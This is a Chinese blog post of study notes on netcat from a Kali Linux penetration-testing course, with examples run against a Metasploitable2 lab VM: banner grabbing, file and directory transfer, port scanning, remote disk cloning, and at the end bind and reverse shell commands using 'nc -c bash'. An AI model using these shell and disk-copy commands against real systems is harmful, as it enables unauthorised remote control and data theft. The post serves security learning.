kali linux 渗透测试 第五章 netcat--nc

最新推荐文章于 2024-06-23 21:56:36 发布
最新推荐文章于 2024-06-23 21:56:36 发布
阅读量2k 收藏 9
点赞数
分类专栏: kali-笔记 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/quedgee/article/details/78473120
版权

继续记笔记~~~

有了netcat,可以不用telnet了
nc的作用:
侦听模式 / 传输模式
telnet / 获取banner信息
传输文本信息
传输文件/目录
加密传输文文件
远程控制/木木⻢马
加密所有流量
流媒体服务器
远程克隆硬盘

-v:显示详细的连接信息(输出内容)
-n:不会进行DNS解析

例如nc 隔壁服务器metasploitable2的域名

root@quedgee:~# nc -vn 172.16.43.139 80
(UNKNOWN) [172.16.43.139] 80 (http) open

当输入head,则返回头文件

root@quedgee:~# nc -vn 172.16.43.139 80
(UNKNOWN) [172.16.43.139] 80 (http) open
head
<html><head><title>Metasploitable2 - Linux</title></head><body>
<pre>

                _                  _       _ _        _     _      ____  
 _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ 
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |
| | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/ 
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|
                            |_|                                          


Warning: Never expose this VM to an untrusted network!

Contact: msfdev[at]metasploit.com

Login with msfadmin/msfadmin to get started


</pre>
<ul>
<li><a href="/twiki/">TWiki</a></li>
<li><a href="/phpMyAdmin/">phpMyAdmin</a></li>
<li><a href="/mutillidae/">Mutillidae</a></li>
<li><a href="/dvwa/">DVWA</a></li>
<li><a href="/dav/">WebDAV</a></li>
</ul>
</body>
</html>

若要实现“聊天”功能,在两台机器上使用与演示:
A(服务器):先要开放(侦听)一个端口
B(客户):作为客户端连接,产生tcp的连接
(333代指某一个端口)
A:nc -l -p 333
B:nc -vn 1.1.1.1 333

在服务器端 nc -l -p 333 打开后,可以用以下命令查看333端口是否开启

root@quedgee:~# netstat -pantu | grep 333
tcp        0      0 0.0.0.0:333             0.0.0.0:*               LISTEN      3730/nc

发现是LISIEN的,于是可以在另一台机子(客户)上使用

root@quedgee:~# nc -vn 192.168.153.141 333
(UNKNOWN) [192.168.153.141] 333 (?) open

于是可以开始进行通信了
客户端输入hello,服务器端收到并返回个what
客户端:

root@quedgee:~# nc -vn 192.168.153.141 334
(UNKNOWN) [192.168.153.141] 334 (?) open
hello
what?

服务器端:

root@quedgee:~# nc -l -p 334
hello
what?

通过这些功能实现电子取证
比方我想在客户端传输文件

root@quedgee:~# ls -l | nc -vn 192.168.153.141 335
(UNKNOWN) [192.168.153.141] 335 (?) open

服务器端会有(条件是服务器端得先打开端口侦听)

root@quedgee:~# nc -l -p 335
总用量 4540
-rw------- 1 root root 5578752 1021 21:28 core
drwxr-xr-x 2 root root    4096 1021 21:34 Desktop
drwxr-xr-x 3 root root    4096 117 18:42 Documents
drwxr-xr-x 2 root root    4096 1022 13:17 Downloads
drwxr-xr-x 2 root root    4096 422  2017 Music
drwxr-xr-x 2 root root    4096 1021 21:33 Pictures
drwxr-xr-x 2 root root    4096 422  2017 Public
drwxr-xr-x 2 root root    4096 422  2017 Templates
drwxr-xr-x 2 root root    4096 422  2017 Videos

如果我想把客户端的进程信息传输到服务器端
客户端:(-q 1 的意思是等一秒钟自动断开连接,表示已经完成)

root@quedgee:~# ps aux | nc -nv 192.168.153.141 333 -q 1
(UNKNOWN) [192.168.153.141] 333 (?) open

此时服务器端已经生成了ps.txt

root@quedgee:~# nc -l -p 333 > ps.txt
root@quedgee:~# ls
core  Desktop  Documents  Downloads  Music  Pictures  ps.txt  Public  Templates  Videos

传输文件
A:nc -lp 333 > 1mp4(如同一个可上传文件的ftp服务器)
B:nc -vn 192.168.153.141 333 < 1.mp4 -q 1

传输端B

root@quedgee:~/Desktop# nc -vn 192.168.153.141 333 < 1.mp4 -q 1
(UNKNOWN) [192.168.153.141] 333 (?) open

接收端A

root@quedgee:~# nc -lp 333 > 1.mp4
root@quedgee:~# ls
1.mp4  Desktop    Downloads  Music     ps.txt  Templates
core   Documents  lsof.txt   Pictures  Public  Videos

接收端和传输端的角色可以互相转换,倘若服务器端开了端口并作为传输端,相当于是开了端口,等着有人来连接,一连接内容便流到客户端

root@quedgee:~# nc -lp 333 < 1.mp4

root@quedgee:~/Desktop# nc -vn 192.168.153.141 333 > a.mp4 -q 1
(UNKNOWN) [192.168.153.141] 333 (?) open

客户端一连接,就把服务器端的1.mp4,保存为a.mp4

传输目录

A:tar -cvf - music/ | nc -lp 333 –q 1
B:nc -nv 1.1.1.1 333 | tar -xvf –

具体思路:服务器端把music目录打包后的结果传到管道里,客户端收到后解包
服务器端:

root@quedgee:~/Desktop# tar -cvf - music/ | nc -lp 333 -q 1
music/
music/a.mp4
music/1.mp4

客户端:

root@quedgee:~# nc -vn 192.168.153.141 333 | tar xvf -
(UNKNOWN) [192.168.153.141] 333 (?) open
music/
music/a.mp4
music/1.mp4
root@quedgee:~# ls
1.mp4 Desktop Downloads music Pictures Public Videos
core Documents lsof.txt Music ps.txt Templates
root@quedgee:~# cd music
root@quedgee:~/music# ls -l
总用量 8
-rw-r–r– 1 root root 3 11月 7 21:26 1.mp4
-rw-r–r– 1 root root 3 11月 7 21:30 a.mp4

加密文件传输:
和传输目录的思想类似,例子是对称加密算法
在A 端解密,在B端加密

A:nc -lp 333 | mcrypt –flush -Fbqd -a rijndael-256 -m ecb > 1.mp4
B: mcrypt –flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 1.1.1.1 333 -q 1

流媒体传输

A:cat 1.mp4 | nc -lp 333
B: nc -nv 1.1.1.1 333 | mplayer -vo x11 -cache 3000 -

服务器端把1.mp4以流的形式一点一点“流进”客户端
其中mplayer需要在kali上安装

NC-端口扫描

  • z:端口扫描(探测tcp的端口)
    加上 -u:可以看所有UDP的端口
    比方说看自己的端口开启状态
root@quedgee:~# nc -vnz 192.168.153.141 1-100
(UNKNOWN) [192.168.153.141] 80 (http) open

nc的扫描功能只有-z,扫描功能不如nmap那么全面

NC——远程克隆硬盘
A: nc -lp 333 | dd of=/dev/sda
B: dd if=/dev/sda | nc -nv 1.1.1.1 333 –q 1
远程电子子取证,可以将目标服务器硬盘远程复制,或者内存。
通过这种方法,拷贝的文件的一模一样
dd命令可以实现块(硬盘)级别的复制
B端为被取证端,A端为接收端,相当于把B端的东西备份到A端

NC远程控制
windows下是通过打开本机的3389远程桌面的端口,对服务器进行远程管理

正向:
• A:nc -lp 333 -c bash
• B:nc 1.1.1.1 333
反向:
• A:nc -lp 333
• B:nc 1.1.1.1 333 -c bash
• 注:Windows用用户把bash改成cmd;

A 端(服务器)先侦听333端口,-c命令实现远程控制,等着有人来连。连上后,通过在客户端就可以查看服务器端的内容,比如ls,或者输入 init6 命令重启。

quedgee
关注
  • 0
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【计算机网络】OSI网络模型之STP通信协议
Tyler的博客
05-17 1956
OSI网络模型之STP通信协议 一、STP通信协议 1、概念 STP又称生成树协议(Spanning Tree Protocol,STP),是一种工作在OSI网络模型中的第二层(数据链路层)的通信协议。 2、应用 基本应用是防止交换机冗余链路产生的环路,用于确保以太网中无环路的逻辑拓扑结构,从而避免广播风暴,大量占用交换机资源。 3、可运行STP协议的设备 在数据链路层中可使用STP协议的设备 分别为: 网桥、以太网交换机、网卡 如下图 二、STP协议的组成 1、BPDU BPDU:BPDU(Bridge
Linux(kali)中nc/ncat实操
Selma003的博客
04-12 7941
ncat和nc命令的一些实战:文本传输、文件传输、远程控制。
部分kali工具使用简介
最新发布
m0_60794056的博客
06-23 638
范围在0-65535,其中固定端口0-1023,1024是保留端口,动态端口就是剩下的1024-65535。可以理解为传输数据用的。Xhydra称为九头蛇,是一款登录爆破神器,Hydar几乎可以爆破各种协议的登录,比如windows的远程桌面、ssh、ftp、路由交换设备等等。Ettercap最初是交换局域网的嗅探器,但在开发过程中,它获得了越来越多的功能,从而使其转变为强大而灵活的中间人攻击工具。Crunch是一种创建密码字典工具,按照指定的规则生成密码字典,可以灵活的制定自己的字典文件。
Kali Linux渗透测试 118 DNS 协议隧道--NCAT
kevinhanser
04-08 765
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程 Kali Linux渗透测试(苑房弘)博客记录 1. 简介 被称为众多 NC 衍生版中最优的选择 代理功能默认侦听端口:31337 ncat -l 8080 –proxy-type http –proxy-auth user:pass broker 中介功
kali中文输入法安装_Kali Linux 中文输入法安装
weixin_39995774的博客
11-23 136
文章来源:华盟论坛文章链接:https://bbs.77169.net/forum.php?mod=viewthread&tid=375394&fromuid=417459环境: kali-linux 19.41.首先配置源如果之前配置过的就可以不用配置了2.leafpad /etc/apt/sources.list我这里只设置一个阿里云的源,设置太多没用将...
kali如何安装netcat_Netcat使用-01
weixin_33073525的博客
01-02 2729
喜欢玩Unix/Linux同学一定对netcat这个工具不陌生,简单讲netcat就是一套操作TCP/UDP的命令行工具集,号称TCP/IP领域的瑞士军刀(官方自称)。下面我们来讲一下如何使用这个feature繁多体积却很小的工具。netcat目前分为两个版本:netcat-traditional 和 netcat-openbsd。netcat-tranditional是GNU工程版本,基本上每个...
Kali Linux渗透测试技术详解
02-19
第1篇为Iinux安全渗透测试基础,介绍了Linux安全透简介、安装及配置KaliLinux 操作系统、配置目标测试系统:第2篇为信息的收集及利用,介绍了信息收集、漏洞扫描、漏洞利用等技术:第3篇为各种渗透测试,介绍了权限...
kali-linux-2021.3-installer-amd64.part4.rar
09-29
kali-linux-2021.3-installer-amd64.iso适用于X64位系统,文件分割成 5个 压缩包,必须集齐5个 文件后才能一起解压一起使用: kali-linux-2021.3-installer-amd64.part5.rar ... kali-linux-2021.3-installer-amd64....
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part1.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
kali-linux-2023.3-vmware-amd64.part3.rar
10-13
kali-linux-2023.3(kali-linux-2023.3-vmware-amd64.7z)适用于VMware系统,文件使用WinRAR分割成四个压缩包,必须一起下载使用: 文件1:https://download.csdn.net/download/weixin_43800734/88423344 文件2:...
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part3.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
netcat安装.docx
10-25
netcat0.7.1安装部署文档.。
kali如何安装netcat_安全检查中...
weixin_35089715的博客
12-24 104
+((!+[]+(!![])+!![]+!![]+!![]+!![]+!![]+!![]+[])+(!+[]+(!![])+!![])+(!+[]+(!![])+!![]+!![]+!![]+!![]+!![]+!![])+(!+[]-(!![]))+(!+[]+(!![])+!![]+!![])+(+!![])+(!+[]+(!![])+!![]+!![]+!![]+!![])+(!+[]+(!...
kali系统安装
anananajiushiwo的博客
07-05 686
一.渗透专用系统简介kali,Cyborg Hawk,Parrot,Security OS,Backbox Linux,BlackArch Linux,Pentoo,Samurai Web Testing,FrameWork(Samurai-WTF),Network Security Toolkit(NST),WifiSlax,Bugtraq,Fedora Security Spin,ArchStrike Linux,DEFT Linux,Caine二.kali linux系统kali linux是基于de
渗透测试工具--NetCat的使用
dreamer_96的博客
03-04 4755
渗透测试工具--NetCat的使用什么是NetCatNetCat的作用用法常用选项 什么是NetCat 在网络工具中有“瑞士军刀”美誉的NetCat,首次出现在1995年。NetCat其实是一个非常简单的Unix工具,他的实际可运行的名字叫nc。非常棒的是,NetCat可以与其他工具结合和重定向,因此,可以说它是互联网里短小精悍的多功能工具。 NetCat的作用 聊天工具 端口扫描 远程控制 文件传输 telnet/获取banner信息 手动连接网络服务 用法 nc属于kali自带工具,位置如下: ┌─
【网络安全】nc的安装和简单操作
热门推荐
你在看屏幕的同时,屏幕也在注视着你
03-08 1万+
nc的安装和简单操作 一.下载nc(这里我用的是yum源的下载) 命令: yum install -y nc 二.实现连接通信操作 (我这里用的是两台虚拟机相互通信, 分别是contos 7 x86版 和 kali 2022版,这里可以把contos当作靶机,kali当作客户端) 1.查找kali的ip地址 命令:ifconfig 2.利用nc 打开端口进行监听(这里我打开的是9999端口) 命令:nc -lnvp 9999 这样就说明已经开始监听了。 3.打开contos 7 连接kali 命令:nc
linux输入nc命令后unknown,Linux nc命令_Linux 教程_服务器相关_教程_教程_JSON在线解析及格式化验证 - JSON.cn...
weixin_39790510的博客
05-05 2003
Linux nc命令用于设置路由器。执行本指令可设置路由器的相关参数。语法nc [-hlnruz][-g][-G][-i][-o][-p][-s][-v...][-w][主机名称][通信端口...]参数说明:-g 设置路由器跃程通信网关,最多可设置8个。-G 设置来源路由指向器,其数值为4的倍数。-h 在线帮助。-i 设置时间间隔,以便传送信息及扫描通信端口。-l 使用监听模式...
nc使用方法
weixin_30606461的博客
11-02 437
Nc(netcut) Numeric(数字的) verbose(冗长的) spam(垃圾邮件) port(端口) filter (过滤器) (Telnet协议是TCP/IP协议族中的一员,是Internet远程登陆服务的标准协议和主要方式。它为用户提供了在本地计算机上完成远程主机工作的能力。在终端使用者的电脑上使用telnet程序,用它连接到服务器。终端使用者可以在telnet程序中输...
网安学习笔记
leo788的博客
07-21 400
指令用法:nc -vn ip port 先ping一下获取pop3端口的ip—123…79 提示信息:端口是Open状态,163服务器是用的是Coremail。#查看指定端口是否开放指令 #netstat -pantu | grep port作用:远程电子取证,原则是尽量对需要审计的对象不做修改,避免破坏证据。例如需要将审查对象上的内容传到自己电脑上而不做保留就可以使用nc 利用管道:指令A | 指令B,即可将指令A所得的结果作为指令B的输入来使用。审计过程中远程进行审计时标准的使用nc传输的方法。 远程接
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值